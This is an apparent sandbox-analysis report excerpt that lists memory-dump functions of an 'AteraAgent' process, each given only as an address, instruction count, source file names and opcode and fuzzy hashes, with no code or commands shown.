                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cc4dc99822032c167cb087b09d12fcc688aaf3b529625ae230318e60472b40af
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 61562110edaf266123b5fc09dd710dd28e7f29d489d52847ccd31caf24cb74d4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc4dc99822032c167cb087b09d12fcc688aaf3b529625ae230318e60472b40af
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBA14B3170EA8A4FE7A5DB5C88616B47BD1EF99310F0505FAD098CB2A7C918BC068381
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B633BF8 Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f9e5eb62ed8eb1718282216c6a7af3bcdfa2982e240cd9aecb8db29d01770f48
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cc5c88b510e171e0a3d058eebffa8a3b799ad4c852b5c43aa62e9ef9ec2c85e4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e5eb62ed8eb1718282216c6a7af3bcdfa2982e240cd9aecb8db29d01770f48
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAA1013170DF498FEB69DB6CC4A0A7173E1EF55314B1506B9D09ECB2A6CA26F842C780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6273E1 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3dda0d66bcc9b27d60101092ec5e58bfa646f1144d8ee055dee8872594ae7866
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0f781501686d4f1883bd8eab9f6ab2f05e332c74e9f03799c224dc9e676ebcce
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dda0d66bcc9b27d60101092ec5e58bfa646f1144d8ee055dee8872594ae7866
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32C10A70E0961D8FEB95DF98C494BBDBBB1FF59300F1541A9D01DE72A5CA34A981CB00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B839E9D Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 472b9ed7b9a15ec0cf97b251610207a006020730f38f3028d598efefc1dfba99
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ddd0110b247f932cbd924bd1319a45397d61234ca8bc27ea6bbc748fa20aee36
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 472b9ed7b9a15ec0cf97b251610207a006020730f38f3028d598efefc1dfba99
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A15830B0E68F4FE329976888B55B87BD1EF8A300F1541BAD48BCA2E7DD3D65468341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B832CA9 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6e4a28f58a98df06905dd2f94625fe82adfec8179b2b8d6f7f04ae6a01846d55
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2254206ce983d4fee9f863739464509c7f4a0e0dae99f665360136cf4e49088d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e4a28f58a98df06905dd2f94625fe82adfec8179b2b8d6f7f04ae6a01846d55
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C914B21B0EA8F4FE755DFAC84656B07B91EF99380B0501F6C459CB2EBDD19BC468390
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B635B70 Relevance: .3, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3cdf89cc867b78c0e568d33cac028115f8ddd57d87f2427b360d09fe7806110e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 47479629acde35791442ef5a367afe1543bd368029b193a4af3f3741210bcccb
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cdf89cc867b78c0e568d33cac028115f8ddd57d87f2427b360d09fe7806110e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41710052F1FC4E0FF7B596AC187927413C1EFA8695B26017BD4AECB2E1DE18AD060380
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B634894 Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5782ba50924ab3f74f73d5cdc675b7908b833892fc645fb3d9238a8ca022d90e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 13dfc975f191c45ffb5e1515ce5f01ee9c51edc03c9acddf218a3c1aea211df1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5782ba50924ab3f74f73d5cdc675b7908b833892fc645fb3d9238a8ca022d90e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B912432B19B4E4FDB68DE6884A55B6B3E0FF55310B10067DD0AAC71E6EE38F8428740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B830480 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: aa354ec09891f03b624742a870244c2a20ef11f58f464d9b52b407c474854223
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 62349dc7e8bcb0228873861f30fc3278abb1416b5cff6c34301564c0623eaf0c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa354ec09891f03b624742a870244c2a20ef11f58f464d9b52b407c474854223
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02A19430A2DF8D8FD7A8EB688054BAAB7E0FF59700F150579D49DC72A2DE34E8858741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B633C20 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3d7712ecddd04181a84ed6a9cdf1cfd04131719be682718dfdaca1ed5287f09
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1ced52b6ddf595157aad07361947889b3f7e0839477759572f3c27a7e5b2113f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3d7712ecddd04181a84ed6a9cdf1cfd04131719be682718dfdaca1ed5287f09
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F191873171DB8D4FDB28DF6884A55B5B7E0EF91310F10067ED4AAC71A6DE28F8428741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83CD70 Relevance: .3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 40005cd4f152683859d6947edce87fa5a4fa8a8939648f086174eb28c4840db3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 748cae594d93cfebe171f5792a8c85a5c9ca56c67d88686b73c58a8790c47023
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40005cd4f152683859d6947edce87fa5a4fa8a8939648f086174eb28c4840db3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1812231B1EB4D4FE7B89B58946967977D1EF88310F05017EE44DC33A2DE25B9428B82
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B831498 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b9791aff1a0ff5c569b58e921e9de9e6a1e3b02de351604aa29bf24d7302739
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e15b6f07ee4029893c519bb80db800928fa090d8213d352184d9f5f11d6a8f8a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9791aff1a0ff5c569b58e921e9de9e6a1e3b02de351604aa29bf24d7302739
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3814C61A0EB8A4FEB759BBC48755B43BA0EF56710F0901BBC49DCB2E7DD246942C350
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62EA10 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 87b06b52c607ff36dc0ef72c8db47be0cc3188bd9b6aed3475190ab49d8375e9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9b984fe0adcc374bf80db5fa6f6622038bfb5a976ee44e2fbe4493983879df49
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b06b52c607ff36dc0ef72c8db47be0cc3188bd9b6aed3475190ab49d8375e9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62714522B0FEDE0FF76596AC48742753BD2EF9665071A02FBD0A9CB1E7D8046D068341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B639C20 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e2340887cedd6617ae7add34207e4ae01e467345f9a94554f8e4c530607aae0d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e8bfcff1221f059cd8d2dc157fddd04bdb29e7a87d490cc59c08e225e73cd062
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2340887cedd6617ae7add34207e4ae01e467345f9a94554f8e4c530607aae0d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07711430B1EA4A4FEBB99B6C846957577D1FF5A300B0504BED09FCB2E6DD28B8418B41
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63A1E5 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 212ea0a61ddac01f01e9dd5c05892df30ae2ca2e2348484c1ef59f1bb27eec09
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 356fe5d78bc3bc2c2be41aaf4f2a87d877b8c37c80866f2a4f5acd026a9a731b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212ea0a61ddac01f01e9dd5c05892df30ae2ca2e2348484c1ef59f1bb27eec09
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C710A22B0FACE5FE776876848751797BA0EF52610B0E01BAC4E88F0F3E915B9169341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B84162D Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 873e2dc00d62f6b76bf78f95cd30e98e48487629ad8942c6d5aced200a481a12
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a500cf4b18c24429c6c463469c49da381360c21b5879bd32e0f034c8cf3b2fbb
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 873e2dc00d62f6b76bf78f95cd30e98e48487629ad8942c6d5aced200a481a12
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB613632B0D74E4FE768AB5CE4625F97BD2EF89324B0501BBD18DC31A7EE25B8464640
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B8398F0 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dddb506911d24e754b19b48b99665529c41d70ee20a556e4af9ea40eefb27507
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d2e0b0ae2ce83f7afa6f5e1d965993f831875f84740d6809f055b0d3919db349
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dddb506911d24e754b19b48b99665529c41d70ee20a556e4af9ea40eefb27507
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8061E23160DE4A4FD76CEB18C451AB677E1EF99310B0046BAD45AC75AACA25F8468780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C9CD Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 605b6c1fedb1f692996a85e30ae269121983d901254deb960c15d1b1099d7803
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 29d7aa3b856a83fbc4b86b0b220625e08f7b5ebc69519b134015862d4cb7c6b5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 605b6c1fedb1f692996a85e30ae269121983d901254deb960c15d1b1099d7803
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D813A30A19A4D8FDFA4EF58C4A4AE977E1FF98354F064275E41DE7265CA34F8418B80
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B839BF8 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 321d2a15b7c8e1e4185e657399929adb55aafe92ad7b4efa2ab0c93ae5a3ee92
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e09bde4053c37c7ca7e4f32d8dcae386897fc327cf535439bfdba56f8fc40506
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 321d2a15b7c8e1e4185e657399929adb55aafe92ad7b4efa2ab0c93ae5a3ee92
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1710470D08A5C8FDB98DF58C885BE9BBB1FB59310F1081AAD04DE3255DB74A985CF41
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63DC05 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cab2f2d67c37e84ec140bd42bb5fafa373ab599a972d1d85322b5f3aa5abaa70
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 04349688d223fcb9943a546e73429c076f0ffbbb3894f5c9b7d89af4132193a8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cab2f2d67c37e84ec140bd42bb5fafa373ab599a972d1d85322b5f3aa5abaa70
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0512921B19D0E0FE7E4AB2C94697B937D5EF94311F0901BBE45DCB2A1DE19BD424381
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B628A55 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b0db69f76b355d714f81092c734f02fe7070eafe0666791cd2b8357bbcce11e4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 70c41b60cc68af754b163710d018ca60c9645f7d0edbf3dc0a93f16fdb0f0276
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0db69f76b355d714f81092c734f02fe7070eafe0666791cd2b8357bbcce11e4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5671C571E0E64D8FEB65DBA898616F97BB0EF46301F0501BAD058DB2E2CB386981C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B633235 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f9aaf95d58129101855a0b3a50a330bae888d8da5cc40c101b1b1e7920724139
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 64f794fb8b911fe7469fd5a7669dd7d0b83474335c4617a409f997e7540a58b0
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9aaf95d58129101855a0b3a50a330bae888d8da5cc40c101b1b1e7920724139
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5761E612B0D6D307E719B7ACA8B24F97B90DF42336B0C41B7E1ED590E7CE18654B8285
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B835438 Relevance: .2, Instructions: 223COMMON
